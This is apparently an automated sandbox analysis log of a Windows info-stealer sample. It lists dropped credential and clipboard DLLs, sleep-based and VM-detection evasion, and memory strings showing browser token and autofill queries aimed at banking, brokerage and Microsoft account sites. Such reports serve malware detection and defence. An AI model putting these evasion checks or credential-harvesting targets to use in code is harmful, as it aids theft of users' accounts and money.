                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1788Thread sleep time: -50025s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820Thread sleep count: 1033 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820Thread sleep time: -2067033s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056Thread sleep count: 968 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056Thread sleep time: -1936968s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292Thread sleep count: 1066 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292Thread sleep time: -2133066s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904Thread sleep count: 254 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904Thread sleep time: -7620000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6472Thread sleep time: -360000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep count: 1151 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep time: -2303151s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292Thread sleep count: 1033 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292Thread sleep time: -2067033s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880Thread sleep count: 1081 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880Thread sleep time: -2163081s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576Thread sleep count: 1070 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576Thread sleep time: -2141070s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep count: 895 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784Thread sleep time: -1790895s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752Thread sleep count: 9379 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752Thread sleep time: -9379000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 5548Thread sleep time: -30000s >= -30000s
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2888Thread sleep count: 130 > 30
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2636Thread sleep count: 129 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276Thread sleep count: 1231 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276Thread sleep count: 450 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe TID: 7992Thread sleep count: 61 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812Thread sleep count: 1415 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812Thread sleep count: 57 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088Thread sleep count: 57 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088Thread sleep time: -114057s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096Thread sleep count: 72 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096Thread sleep time: -144072s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080Thread sleep count: 61 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080Thread sleep time: -122061s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056Thread sleep count: 303 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056Thread sleep time: -9090000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7868Thread sleep time: -360000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076Thread sleep count: 8437 > 30
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076Thread sleep time: -16882437s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe TID: 2676Thread sleep time: -23058430092136925s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe TID: 6624Thread sleep time: -23980767295822402s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1149 delay: -10
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1231 delay: -10
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeThread sleep count: Count: 1415 delay: -10
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696xa
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
                              Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
                              Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696428
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865j
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r global passwords blocklistVMware20,11696428655
                              Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865h
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}lfons\AppData\Local\Temp\heidivqkoBMIvF7c3\yFCGJeJiS2CNWeb Dataion VA
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696428655
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696428655d
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}M`p
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696428655
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: explorha.exe, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000167A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW =k
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                              Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x%
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rootpagecomVMware20,11696428655o
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.portal.azure.comVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!
                              Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428p
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageformVMware20,11696428655
                              Source: 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\m
                              Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3260757823.0000000007A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}cGVhZm1tZ2RwZmtvZ2tnaGNwaWhh2j4FMS4yLjDgPtDD9agG6D4A6D4G6D4L8D7Qw/WoBsoBWggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgAeACAAQDIPgPSPiBtaGpmYm1kZ2NmamJicGFlb2pvZm9ob2VmZ2llaGphado+ATHgPtDD9agG6D4A8D7Qw/WoBsoBXggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgCeACAAQDIPgPSPiBuY2JqZWxwamNoa3BiaWticGtjY2hraGtibG9kb2FtYdo+BTIuMC4y4D7Qw/WoBug+APA+0MP1qAbKAV8IARAFGAIgACgAMAA4AEAASABQAFgAYABoAngAgAEAyD4D0j4gbmtlaW1ob2dqZHBucGNjb29mcGxpaW1hYWhtYWFvbWXaPgYxLjMuMjHgPtDD9agG6D4A8D7Qw/WoBvgBsiiAAv///////////wGIAgGoAoQXsgIQd6OHVV3LMHKvjeie9v2i18o+1wcKBAgAEAASEgoCCAMSAggIGgIIASIECAAQARoPCg1ub19lbnYtbm9fdmVyIgIIAjJiCAAaLDQ3REVRcGo4SEJTYSsvVEltVys1SkNldVFlUmttNU5NcEpXWkczaFN1RlU9Ii4icFpMaFRhSjIzaE41dVF4d3p1MEsyQ1llcy9kdkp1RTkzVmJJVlYvTG5SQT0iKgA6Cwjz///v9/////8BQikSCjEuMy4xNzcuMTEYBSAAKg5SZWdLZXlOb3RGb3VuZDIHd2luZG93c1ICCAFa/AUJdZMYBFaWU0AR3SQGgZVTRkAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8ZAAAAAAAAAAAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8yFQiH9N6X29eyvKYBEggIABABIJCABDISCNvpsoebrM36GRIGCAAQASAQMhII++qnh8mYwYhfEgYIABABIBAyEgjozNnlpJyeyzkSBggAEAEgEDITCOC54qSdyuvjjgESBggAEAEgEDISCNn9xMr9td2KbRIGCAAQASAQMhIIgteJ4NSXj9E2EgYIABABIBAyEgjmzv2twIj8gn4SBggAEAEgEDIUCKfHy9mkub6BwwESBwgBEAEgkGAyFQiauYjc7KfS3OEBEggIABABIJCABDITCJnwsYm4+NWOLBIHCAEQASCQYDIUCNHJvLvV2cza5wESBwgBEAEgkGAyEwiQrNz7jbLTpQwSBwgBEAEgkGAyEgjVuuKf55342XkSBggAEAEgEDITCPeTqZiGj5aaSRIHCAEQASCQYDISCLPMhM/6sZX2NRIGCAAQASAQMhIIh6SA76Kw0u9WEgYIABABIBAyEwjcx7n5qNnem6MBEgYIABABIBAyFAjKvKW5jY/Wx+cBEgcIARABIJBgMhQIwqf5grzUgKTqARIHCAEQASCQYDIWCJiYntn49dXkggESCQgAEAEggICACDITCMuAzLDq3NSUzwESBggAEAEgEDITCIS9vZeNgI79kgESBggAEAEgEDITCP7Mx9PU/OC9iQESBggAEAEgEDISCNKq8/iqnu6OFRIGCAAQASAQMhQImuHa5M/ohPHnARIHCAEQASCQYHoCCACCAQIYAA==metameta
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}u.gn,v.gn,w.gn,x.gn,y.gn,z.gn,a.hk,b.hk,c.hk,d.hk,e.hk,f.hk,g.hk,h.hk,i.hk,j.hk,k.hk,l.hk,m.hk,n.hk,o.hk,p
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: billing_address_id.comVMware20,11696428
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .utiitsl.comVMware20,1169642865
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
                              Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware20,11696428655
                              Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169642865
                              Source: c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
                              Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428(
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
